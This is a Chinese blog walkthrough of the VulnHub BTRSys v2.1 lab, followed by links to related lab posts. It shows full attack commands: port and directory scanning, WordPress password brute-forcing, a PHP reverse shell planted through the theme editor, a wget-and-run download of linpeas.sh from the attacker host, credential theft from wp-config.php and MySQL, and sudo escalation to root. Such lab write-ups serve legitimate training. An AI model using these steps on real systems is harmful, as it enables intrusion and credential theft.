vulnhub BTRSys: v2.1

最新推荐文章于 2024-01-26 16:58:57 发布
最新推荐文章于 2024-01-26 16:58:57 发布
阅读量574 收藏
点赞数
分类专栏: vulnhub 文章标签: 数据库 mysql wpscan wordpress linpeas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/126613575
版权

渗透思路:

nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan扫描wordpress用户名并爆破密码 ---- 利用WordPress的模板编辑功能getshell ---- wordpress配置文件泄露数据库用户名密码 ---- 数据库泄露btrisk用户的密码 ---- sudo su提权

环境信息:

靶机:192.168.101.99

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.99

发现ftp、ssh和http端口

2、gobuster扫描网站目录

gobuster dir -u http://192.168.101.99 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/wordpress目录

3、wpscan扫描wordpress用户名并爆破密码

wpscan --url http://192.168.101.99/wordpress -e

扫描到两个用户btrisk和admin

分别用wpscan爆破这两个用户的密码,btrisk的密码没有爆破出来,admin的密码是admin

wpscan --url http://192.168.101.99/wordpress -U admin -P "rockyou.txt"

4、利用WordPress的模板编辑功能getshell

以用户admin密码admin进行登录:http://192.168.101.99/wordpress/wp-admin/

登录成功后依次点击左侧栏Appearance和Editor,右侧栏404 Template,然后用kali linux中/usr/share/webshells/php/php-reverse-shell.php的内容进行替换,记得根据自己的环境修改$ip和$port为攻击机监听反弹shell的ip和端口

然后点击页面下方的Update File按钮,当页面如上图这样显示File edited successfully.表示模板修改成功。

此时在攻击机上用nc监听8888端口

nc -nlvp 8888

浏览器访问http://192.168.101.99/wordpress/wp-content/themes/twentyfourteen/404.php

可以在攻击机上得到靶机www-data用户的反弹shell

输入如下命令可以得到交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

5、wordpress配置文件泄露数据库用户名密码

ss -antp

发现本地开着3306端口(mysql),但目前不知道用户名和密码

从攻击机上下载linpeas.sh,并执行

wget http://192.168.101.34/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

发现wordpress配置文件/var/www/html/wordpress/wp-config.php泄露了数据库用户名root,密码rootpassword!

6、数据库泄露btrisk用户的密码

以用户名root登录本地mysql

mysql -u root -p

密码rootpassword!

登录成功后查看所有数据库名称

mysql> show databases;

由于在系统上我们也发现了btrisk用户,而之前在wordpress上也发现了btrisk用户,所以选择wordpress数据库,查看数据库中所有表,发现有名为wp_users的表,查看该表所有数据

mysql> use wordpress;
mysql> show tables;
mysql> select * from wp_users;

发现btrisk用户密码的md5值为a318e4507e5a74604aafb45e4741edd3

在网站MD5免费在线解密破解_MD5在线加密-SOMD5上爆破,发现其明文密码为roottoor

7、提权

用su命令切换到btrisk用户,密码为roottoor

然后执行sudo -l查看btrisk用户可以sudo执行的命令,发现其可以以任何用户的身份执行任何命令

因此可以sudo su -提权到root用户

仙女象
关注
专栏目录
WPScan(WordPress专用扫描器)
墨痕诉清风的博客
05-29 1791
hellp _________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
CTF靶场——BTRisk
su__xiaoyan的博客
01-23 1016
实验环境 攻击机:172.20.10.5 靶机:172.20.10.6 实验流程 端口扫描 命令:nmap -p- IP地址 开放了21、22以及80端口 端口详细信息探测 命令:nmap -T4 -A -v IP地址 21端口对应的ftp服务使用的是vsftpd 3.0.2搭建的 80端口对应的Web服务器为Apache 2.4.7 21端口溢出漏洞探测 命令:searchsploit vsftp 3.0.2 vsftp 3.0.2并不存在溢出漏洞 网站详细信息探测 命令:nikto -host
vulnhub:BTRSys2
cjstang的博客
06-18 2482
OSCP-3:主要利用方式:wordpress账号密码破解+PHP马反弹shell+系统内核低版本提权
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2805
Vulnhub-Btrsys-2靶机实战
OSCP系列靶场-Intermediate-BTRSys2.1保姆级
杳若的博客
09-19 964
OSCP系列靶场-Intermediate-BTRSys2.1保姆级
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
靶机实战(9):OSCP备考之VulnHub BTRSys v2.1
OneMoreThink
01-06 1004
靶机官网:BTRSys: v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发...
靶机渗透——BTRsys1
1匹黑马
02-23 1764
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:BRTsys1 涉及知识点:代码审计、目录遍历、文件上传、脏牛提权 信息收集 还是老样子先进行信息收集: arp-scan -l #扫描内网存活主机 接着扫一下开放的端口与版本信息 nmap -sV -O 192.168.1.116 开放了22、80端口,话不多说,直接扫一下Web页面...
BTRSys:v2.1靶机
小小猪的博客
06-07 454
BTRSys:v2.1靶机 主机扫描,arp-scan -l nmap -sV -pN -A x.x.x.228,发现80,21,22端口 dirb http://x.x.x.228,发现网站是wordpress搭建的 用wpscan枚举用户和插件,找到了两个用户btrisk和admin wpscan --url http://x.x.x.228/wordpress -e u vp 爆破出用户admin的密码admin wpscan --url http://x.x.x
CTF 靶场之BTRisk通关笔记
qq_54531152的博客
01-26 383
安装 VMware Workstation,kali Linux ,搭建或下载BTRisk靶场,如果是下载的靶场不知道密码,可以配置net模式,然后通过arp-scan整个网段获取目标机器的IP地址。这里看到了三个可疑目录,尝试后可以看到/uploads/存储上传的文件的地方,/login.php 是一个登录的页面,/config.php啥也没有。回到目标主机,下载41760.txt,下载不了,但ping得通,不知道为啥,有没有大佬提点一下。找到了,然后打开searchsploit,寻找对应的exp,
靶机-BTRSys 2.1 Walkthrough
banacyo14206的博客
08-22 683
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
CTF靶场——BTRsys-2
su__xiaoyan的博客
01-24 1114
实验环境 攻击机:192.168.100.146 靶机:192.168.100.139 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 FTP服务由vsftpd 3.0.3搭建,不存在代码溢出漏洞 网站详细信息探测 网站疑似使用WordPress作为建站系统 web网站目录爆破 证实以WordPress作为建站系统,并且拿到网站后台登录页面 访问网站后台登录页面,尝试使用弱口令进行登录,登录成功(admin/admin) 漏洞利用 WordPress后台存
vulnhubBTRsys-2 靶机
Nicky_Zheng的博客
01-29 1298
1、信息收集 1.1、端口扫描 使用netdiscor或arp获取到靶机 ip:192.168.57.137 使用nmap获取端口信息 kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( http
BTRSys1靶场复现详细过程
hcufo的博客
09-06 277
一次靶详细的靶场演练,非常成功
BTRSys: v1靶机
小小猪的博客
06-08 796
BTRSys: v1靶机 靶机地址:https://www.vulnhub.com/entry/btrsys-v1,195/ 靶机难度:初级/中级 arp-scan -l 扫描获取靶机ip:x.x.x.229 nmap -sV -Pn -A x.x.x.229 扫描出80,22,21端口 dirb http://x.x.x.229 -X .php 扫描出config.php,login.php 登录,弱口令,不成功 查看源码 substring就是截取,...
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值